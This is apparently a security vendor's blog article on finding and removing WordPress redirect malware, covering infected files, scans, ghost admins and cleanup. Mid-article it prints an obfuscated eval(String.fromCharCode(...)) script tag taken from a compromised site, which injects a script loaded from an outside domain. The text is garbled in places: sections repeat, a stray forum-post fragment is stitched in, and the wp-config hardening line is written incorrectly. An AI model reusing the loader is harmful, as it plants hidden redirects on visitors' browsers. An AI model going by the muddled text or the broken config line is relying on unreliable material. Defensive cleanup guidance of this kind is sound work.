WordPress Website Hacked Redirect? Website Redirect to Malicious Domain

Does your WordPress website forward users to unknown and unsecured websites? If so, your website may be hacked. These WordPress hacked redirect attacks are common, because the malware redirects visitors to spammy websites, phishing pages or hacker-controlled domains. We noticed recently that wp-admin is redirected to spammy ads & counterfeit CAPTCHA pages. Attackers do this by various means and infection sources. In this article, we will try to find the causes of WordPress redirection hack, understand the consequences and discuss the complete removal process.

What is WordPress Redirect Hack?

A WordPress malware redirect hack is a common type of attack, which redirects visitors to phishing sites or malicious websites automatically.

  • WordPress Redirect Hack can bring serious branching, such as: It can blacken your brand image and your reputation as a company.
  • WordPress Redirect Hack can cause huge traffic loss, obviously because your hard-earned visitors will be redirected.
  • Less traffic, in turn, could lead to lower sales. This affects the company.
  • The websites your visitors visit could pitch an illegal commodity that could land your website and lead you to a legal drama.
  • Continue reading this article to know how to remove malware from WordPress and get your website out of this misfortune.

Step by Step Guide to Fix Hacked Website Redirect

  • Backup the Site & files with Database

There are tools available online to compare and making a decision on which is new code in the files. Also, you may request your hosting provider to have a backup copies. In some hosting company they manage the backup by default.

  • Check for domain redirection from Different ip and devices

Sometime, hackers infects the website in a tricky way so, you website will be redirect only when it is been accessed from particular ip region. In those cases, we can’t detect the issues easily.

Most common infected Files & Plugin

  • .htaccess , wp-config.php files are mostly become victim
  • WordPress plugin outdation will again a problem WP File
  • Theme files (footer.php, header.php, function.php & index.php)
  • Check for all recent modification, Also check for recently installed plugin.

Deleting Malware with scanning

  • Complete domain scanning & analyze core files changes
  • Look for source code for malware script
  • Look into your database changes , Siteurl  or home option in the wp_options table

Implement Security & Firewall

  • Change the password
  • CMS admin
  • Database user account
  • Hosting account

Use advanced WAF (Web Application Firewall) to boost up your security

WordPress Hacked Redirect:

How was your website infected with WordPress?

Various methods are used by attackers to redirect the user.

  • Some of them are: Redirect users via malicious codes.
  • Attackers may also execute.php codes.
  • Attackers may add ghost admin to your website to fantasize.

By adding codes to the.htaccess/wp-config.php files

We have in many cases seen malicious code or files hidden in the.htaccess file by the attackers. Sometimes these codes look exactly the same as the legitimate ones. This makes it harder to identify and delete them. Besides the code insertion of.htaccess files, other key WordPress files, such as wp-config.php, wp-vcd, etc., might cover the codes to name a few.

The following picture shows the hidden codes found by our experts on one of the sites of our customer.

eval

Users were also confronted with a situation when using Internet Explorer. On Internet Explorer, the malware has taken users to websites that have forced fake Java and Flash updates. This link led to adobe flash player-31254524.exe being downloaded. This has been reported by several security services as malware.

By adding yourself as a ghost admin, you can add yourself as an admin on the site once you access your website. Now that they process the site’s full power, they redirect it to other illegally, obscene or unchecked domains.

How to remove eval(String.fromCharCode(118, 97, 114, 32 wordpress hacking code?

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 115, 115, 99, 114, 105, 112, 116, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 32, 115, 115, 99, 114, 105, 112, 116, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 32, 115, 115, 99, 114, 105, 112, 116, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 106, 115, 111, 110, 46, 115, 116, 114, 105, 110, 103, 101, 110, 103, 105, 110, 101, 115, 46, 99, 111, 109, 47, 106, 115, 111, 110, 46, 106, 115, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 115, 99, 114, 105, 112, 116, 41, 59, 10))</script>

1) Old theme code (will be updated but requires weeks), protected by firewall
2) Code injected in the database that may cause malware spreading

As for number 2, I have performed scans with many plugins, and apparently there are no threats. I have also dumped the DB but I have no idea what to look for.

Where is the Redirect Infection for WordPress?

Attackers can infect the site by injecting code into any of the key WordPress files. Check the following malicious codes for these files:

Users were also confronted with a situation when using Internet Explorer. On Internet Explorer, the malware has taken users to websites that have forced fake Java and Flash updates. This link led to adobe flash player-31254524.exe being downloaded. This has been reported by several security services as malware.

By adding yourself as a ghost admin

You can add yourself as an admin on the site once you access your website. Now that they process the site’s full power, they redirect it to other illegally, obscene or unchecked domains.

Where is the Redirect Infection on WordPress found?

Attackers can infect the site by injecting code into any of the key WordPress files. Check the following malicious codes for these files:

  • index.php
  • Index.html
  • .htaccess file
  • Theme files
    1. Footer.php
    2. Header.php
    3. Functions.php

Scanning for WordPress malware redirection:

The first step is to delete the malware. Attackers could have used several areas to infect, and their identification will help you get rid of it.

Scan Core Files

The core WordPress files determine WordPress software’s appearance and functionality. It will also help you to identify the changes in the core files. When you analyze the codes in the files, you have the source of the attack if you find some unknown changes. However, if your website has malware, this process will not reveal anything. You therefore need to carry out authenticity checks periodically.

  • In addition, Google Diagnostic Page is a tool that can help you determine which part of your website contains the infection. It also indicates the number of infected files / directories.
  • The code is mostly hidden in a few core WordPress files. Some of the infection areas are index.php, index.html, theme files, etc.
  • An infectious code injected into the website Header.php file was one of the most popular instances of such a hacked WordPress redirect. The code looks like a bunch of unimportant characters. The code, however, redirects users to the default website and sets a one-year cookie.
  • Known malicious codes can also be found in keywords such as’ eval’ or’ base64 decode.’ While most malicious codes contain this, it should not be said that every piece of code that contains this is a malicious code. Many times, users delete good codes which are suspected of being bad.
  • In another case of the hacked WordPress site, the attackers injected JavaScript codes in all.js extension files. The previous version of the code infected the jquery.js files only. In all cases, the codes were part of legitimate files that made detection difficult.

Scan WP Admin

Another way to infect the attacker is by adding yourself as a ghost admin on your website. To check the user list, go to the WP administrator and check the authentic user list. If your website has membership rules, it could be a little difficult for all users to pass through. However, a website with a few users is easily scanned and suspect users are found. You can just remove the ghost users from the list once you find them.

Scan Plugins & Themes

  • Uncontrolled or unknown plugins can also infect your site.  By going to WP administration and then clicking on’ Plugins,’ you can view the entire list of plugins. If you detect any unidentified or suspect plugins, remove them.
  • You must also compare your plugin files manually with the original ones and detect any anomalies. You may download and match the installed plugins against the same plugins from the WordPress plugin repository. This has however its limitations, since no plugins are updated in the repository when a new version is pushed out.
  • There is always a chance you can infect your theme files. Therefore, it is a better option to scan your theme files manually instead of using free security services. By using a comparison tool, you can compare your installation files with the original ones. If you find differences, go ahead and find out why and how it came about.

WordPress redirects hacked?

Give us a chat widget message and we’d be glad to help you. With our annual Pro Plan, we take full responsibility for one year of your WordPress website. If something goes south with safety, we will fix it without any questions. Fix my website for WordPress now.

WordPress Redirect Hacked:

How do you clean up your website? Now the scan is done. Let’s move on to the process of malware removal. You’ve probably found the changes / malware. If not, read on. If not.

Manual Cleanup of Malware

  • The first step is to view your logs on your server. You will find clues to any infection that has crept into your server logs. You can also check unknown IP addresses that may have injected malicious code into your website. Any unknown POST requests can also be investigated. These requests send data to your site and may have malware sent to your site, thereby redirecting the WordPress site hacked. And remove them promptly.
  • You can also run commands on your website to find out where your website has been compromised. Then you can remove them manually to retrieve your website. Some of the commands you can use are the Grep and Find commands that work via a ssh client.
  • Go to and clean infected files from the back-end. Change the configuration to return to the original settings. Once you do, it is time you plug the infringement. You can update your plugins and themes to do this. Because these are the most common infection sites.

WordPress Hacked Redirect:

You need to update your secret keys and passwords after cleanup steps to protect your website. You may also need to reinstall all free and premium plugins to ensure fresh configuration.

The Google Webmaster tool would be a good step forward. This is a free tool that will allow you to better manage a lot of information about your website. Unknown malware can also be submitted for evaluation. Once the Website is cleaned, submit it for review together with all the steps you have taken to remove the malware. You can do so by following the following steps:

  • Log in to the Google Search Console
  • Verify your ownership of the website
  • Go to Site, then click on the Dashboard option
  • Select the Security Issue

In most cases, the infection is in the website header.php file. This only happens if the attacker has access to WordPress ‘ admin interface and can change the file settings of the theme. By deactivating the user’s ability to change PHP files via wp-admin, you can prevent such attacks. To make the settings change, add the following code to wp-config.php-file:

define(‘DISALLOW FILE EDIT’, true);

this protects your website from hacked redirects from WordPress, preventing any website interference.

WordPress Malicious Directs:

Conclusion

Once you have finished cleaning up your website, you are willing to put it online again. Test the functioning of your website before doing so and make sure there are no defects. You will also need to strengthen the security of your website. A premium website security service such as Astra is among the best options. They will ensure that your website is safe and secure against any hacked WordPress redirects. In addition to its firewall and VAPT (Vulnerability Assessment & Penetration Testing), Astra offers the following features: remote malware scanning, file injection protection, spam login protection. You can breathe easily with their latest and comprehensive tools.

I also suggest that you follow this video step by step to secure your WordPress site.

Was this article helpful?

Leave a Reply

Your email address will not be published. Required fields are marked *